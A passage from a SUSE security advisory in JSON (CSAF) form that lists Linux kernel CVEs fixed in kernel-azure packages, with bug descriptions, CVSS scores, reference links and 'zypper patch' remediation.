"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninterconnect: Don\u0027t access req_list while it\u0027s being manipulated\n\nThe icc_lock mutex was split into separate icc_lock and icc_bw_lock\nmutexes in [1] to avoid lockdep splats. However, this didn\u0027t adequately\nprotect access to icc_node::req_list.\n\nThe icc_set_bw() function will eventually iterate over req_list while\nonly holding icc_bw_lock, but req_list can be modified while only\nholding icc_lock. This causes races between icc_set_bw(), of_icc_get(),\nand icc_put().\n\nExample A:\n\n CPU0 CPU1\n ---- ----\n icc_set_bw(path_a)\n mutex_lock(\u0026icc_bw_lock);\n icc_put(path_b)\n mutex_lock(\u0026icc_lock);\n aggregate_requests()\n hlist_for_each_entry(r, ...\n hlist_del(...\n \u003cr = invalid pointer\u003e\n\nExample B:\n\n CPU0 CPU1\n ---- ----\n icc_set_bw(path_a)\n mutex_lock(\u0026icc_bw_lock);\n path_b = of_icc_get()\n of_icc_get_by_index()\n mutex_lock(\u0026icc_lock);\n path_find()\n path_init()\n aggregate_requests()\n hlist_for_each_entry(r, ...\n hlist_add_head(...\n \u003cr = invalid pointer\u003e\n\nFix this by ensuring icc_bw_lock is always held before manipulating\nicc_node::req_list. The additional places icc_bw_lock is held don\u0027t\nperform any memory allocations, so we should still be safe from the\noriginal lockdep splats that motivated the separate locks.\n\n[1] commit af42269c3523 (\"interconnect: Fix locking for runpm vs reclaim\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-27005",
"url": "https://www.suse.com/security/cve/CVE-2024-27005"
},
{
"category": "external",
"summary": "SUSE Bug 1223800 for CVE-2024-27005",
"url": "https://bugzilla.suse.com/1223800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2024-27005"
},
{
"cve": "CVE-2024-42103",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-42103"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix adding block group to a reclaim list and the unused list during reclaim\n\nThere is a potential parallel list adding for retrying in\nbtrfs_reclaim_bgs_work and adding to the unused list. Since the block\ngroup is removed from the reclaim list and it is on a relocation work,\nit can be added into the unused list in parallel. When that happens,\nadding it to the reclaim list will corrupt the list head and trigger\nlist corruption like below.\n\nFix it by taking fs_info-\u003eunused_bgs_lock.\n\n [177.504][T2585409] BTRFS error (device nullb1): error relocating ch= unk 2415919104\n [177.514][T2585409] list_del corruption. next-\u003eprev should be ff1100= 0344b119c0, but was ff11000377e87c70. (next=3Dff110002390cd9c0)\n [177.529][T2585409] ------------[ cut here ]------------\n [177.537][T2585409] kernel BUG at lib/list_debug.c:65!\n [177.545][T2585409] Oops: invalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\n [177.555][T2585409] CPU: 9 PID: 2585409 Comm: kworker/u128:2 Tainted: G W 6.10.0-rc5-kts #1\n [177.568][T2585409] Hardware name: Supermicro SYS-520P-WTR/X12SPW-TF, BIOS 1.2 02/14/2022\n [177.579][T2585409] Workqueue: events_unbound btrfs_reclaim_bgs_work[btrfs]\n [177.589][T2585409] RIP: 0010:__list_del_entry_valid_or_report.cold+0x70/0x72\n [177.624][T2585409] RSP: 0018:ff11000377e87a70 EFLAGS: 00010286\n [177.633][T2585409] RAX: 000000000000006d RBX: ff11000344b119c0 RCX:0000000000000000\n [177.644][T2585409] RDX: 000000000000006d RSI: 0000000000000008 RDI:ffe21c006efd0f40\n [177.655][T2585409] RBP: ff110002e0509f78 R08: 0000000000000001 R09:ffe21c006efd0f08\n [177.665][T2585409] R10: ff11000377e87847 R11: 0000000000000000 R12:ff110002390cd9c0\n [177.676][T2585409] R13: ff11000344b119c0 R14: ff110002e0508000 R15:dffffc0000000000\n [177.687][T2585409] FS: 0000000000000000(0000) GS:ff11000fec880000(0000) knlGS:0000000000000000\n [177.700][T2585409] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [177.709][T2585409] CR2: 00007f06bc7b1978 CR3: 0000001021e86005 CR4:0000000000771ef0\n [177.720][T2585409] DR0: 0000000000000000 DR1: 0000000000000000 DR2:0000000000000000\n [177.731][T2585409] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:0000000000000400\n [177.742][T2585409] PKRU: 55555554\n [177.748][T2585409] Call Trace:\n [177.753][T2585409] \u003cTASK\u003e\n [177.759][T2585409] ? __die_body.cold+0x19/0x27\n [177.766][T2585409] ? die+0x2e/0x50\n [177.772][T2585409] ? do_trap+0x1ea/0x2d0\n [177.779][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.788][T2585409] ? do_error_trap+0xa3/0x160\n [177.795][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.805][T2585409] ? handle_invalid_op+0x2c/0x40\n [177.812][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.820][T2585409] ? exc_invalid_op+0x2d/0x40\n [177.827][T2585409] ? asm_exc_invalid_op+0x1a/0x20\n [177.834][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.843][T2585409] btrfs_delete_unused_bgs+0x3d9/0x14c0 [btrfs]\n\nThere is a similar retry_list code in btrfs_delete_unused_bgs(), but it is\nsafe, AFAICS. Since the block group was in the unused list, the used bytes\nshould be 0 when it was added to the unused list. Then, it checks\nblock_group-\u003e{used,reserved,pinned} are still 0 under the\nblock_group-\u003elock. So, they should be still eligible for the unused list,\nnot the reclaim list.\n\nThe reason it is safe there it\u0027s because because we\u0027re holding\nspace_info-\u003egroups_sem in write mode.\n\nThat means no other task can allocate from the block group, so while we\nare at deleted_unused_bgs() it\u0027s not possible for other tasks to\nallocate and deallocate extents from the block group, so it can\u0027t be\nadded to the unused list or the reclaim list by anyone else.\n\nThe bug can be reproduced by btrfs/166 after a few rounds. In practice\nthis can be hit when relocation cannot find more chunk space and ends\nwith ENOSPC.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-42103",
"url": "https://www.suse.com/security/cve/CVE-2024-42103"
},
{
"category": "external",
"summary": "SUSE Bug 1228490 for CVE-2024-42103",
"url": "https://bugzilla.suse.com/1228490"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2024-42103"
},
{
"cve": "CVE-2024-53070",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53070"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: dwc3: fix fault at system suspend if device was already runtime suspended\n\nIf the device was already runtime suspended then during system suspend\nwe cannot access the device registers else it will crash.\n\nAlso we cannot access any registers after dwc3_core_exit() on some\nplatforms so move the dwc3_enable_susphy() call to the top.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53070",
"url": "https://www.suse.com/security/cve/CVE-2024-53070"
},
{
"category": "external",
"summary": "SUSE Bug 1233563 for CVE-2024-53070",
"url": "https://bugzilla.suse.com/1233563"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2024-53070"
},
{
"cve": "CVE-2024-53149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: ucsi: glink: fix off-by-one in connector_status\n\nUCSI connector\u0027s indices start from 1 up to 3, PMIC_GLINK_MAX_PORTS.\nCorrect the condition in the pmic_glink_ucsi_connector_status()\ncallback, fixing Type-C orientation reporting for the third USB-C\nconnector.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53149",
"url": "https://www.suse.com/security/cve/CVE-2024-53149"
},
{
"category": "external",
"summary": "SUSE Bug 1234842 for CVE-2024-53149",
"url": "https://bugzilla.suse.com/1234842"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "low"
}
],
"title": "CVE-2024-53149"
},
{
"cve": "CVE-2024-56721",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-56721"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/CPU/AMD: Terminate the erratum_1386_microcode array\n\nThe erratum_1386_microcode array requires an empty entry at the end.\nOtherwise x86_match_cpu_with_stepping() will continue iterate the array after\nit ended.\n\nAdd an empty entry to erratum_1386_microcode to its end.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-56721",
"url": "https://www.suse.com/security/cve/CVE-2024-56721"
},
{
"category": "external",
"summary": "SUSE Bug 1235566 for CVE-2024-56721",
"url": "https://bugzilla.suse.com/1235566"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2024-56721"
},
{
"cve": "CVE-2025-22047",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22047"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/microcode/AMD: Fix __apply_microcode_amd()\u0027s return value\n\nWhen verify_sha256_digest() fails, __apply_microcode_amd() should propagate\nthe failure by returning false (and not -1 which is promoted to true).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22047",
"url": "https://www.suse.com/security/cve/CVE-2025-22047"
},
{
"category": "external",
"summary": "SUSE Bug 1241437 for CVE-2025-22047",
"url": "https://bugzilla.suse.com/1241437"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-22047"
},
{
"cve": "CVE-2025-37744",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37744"
}
],
"notes": [
{
"category": "general",
